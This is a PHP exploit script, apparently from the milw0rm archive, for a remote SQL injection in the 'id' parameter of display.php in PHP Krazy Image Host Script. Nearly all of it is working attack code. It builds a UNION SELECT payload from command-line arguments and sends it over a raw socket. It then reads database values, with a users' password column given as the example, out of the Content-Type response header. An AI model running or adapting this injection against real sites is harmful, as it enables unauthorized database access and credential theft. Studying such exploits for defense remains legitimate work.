<?
/*****************************************************************\
|* PHP Krazy Image Host Script (id) Remote SQL Injection Exploit *|
|* Discovered by: Trex                                           *|
|* Solution: http://www.trex-online.net/fixes/display.rar        *|
|* Visit: Trex-Online.net / UnderGround.ag                       *|
\*****************************************************************/

error_reporting(0);

echo "# PHP Krazy Image Host Script (id) Remote SQL Injection Exploit\n";
echo "# Discovered by: Trex\n";
echo "# Solution: http://www.trex-online.net/fixes/display.rar\n";
echo "# Visit: Trex-Online.net / UnderGround.ag\n\n";
echo "# Usage: $ php " . $_SERVER['PHP_SELF'] . " [URL] [PATH] [SELECT] [FROM] [WHERE]\n";
echo "# Example: $ php " . $_SERVER['PHP_SELF'] . " http://localhost /images/ password users userID=1\n\n";

if (!$_SERVER['argv'][5])
	die();

$url = parse_url($_SERVER['argv'][1] . $_SERVER['argv'][2]);

$sql = "UNION+SELECT+1,1,1,1," . $_SERVER['argv'][3] . ",1,1,1+FROM+" . $_SERVER['argv'][4] . "+WHERE+" . $_SERVER['argv'][5] . "/*";

echo "Connecting to " . $url['host'] . ":80 ... ";

if (!$fsp = fsockopen($url['host'], 80, $errno, $errstr, $timeout))
	die("failed.\nReason: " . $errno . " - " . $errstr);

echo "done.\n\n";

$request  = "HEAD " . $url['path'] . "display.php?id=0+" . $sql . " HTTP/1.1\r\n";
$request .= "Host: " . $url['host'] . "\r\n";
$request .= "Connection: Close\r\n\r\n";

fputs($fsp, $request);

while (!feof($fsp)) {
	$response = fgets($fsp, 4096);
	$response = explode(":", $response, 2);

	if (count($response) == 2 && preg_match("/Content-Type/", $response[0]))
		$result = $response[1];
}

if (preg_match("/text\/html/", $result))
	echo "Exploit failed!";
else
	echo "Result: " . $result;
?>

# milw0rm.com [2006-09-29]
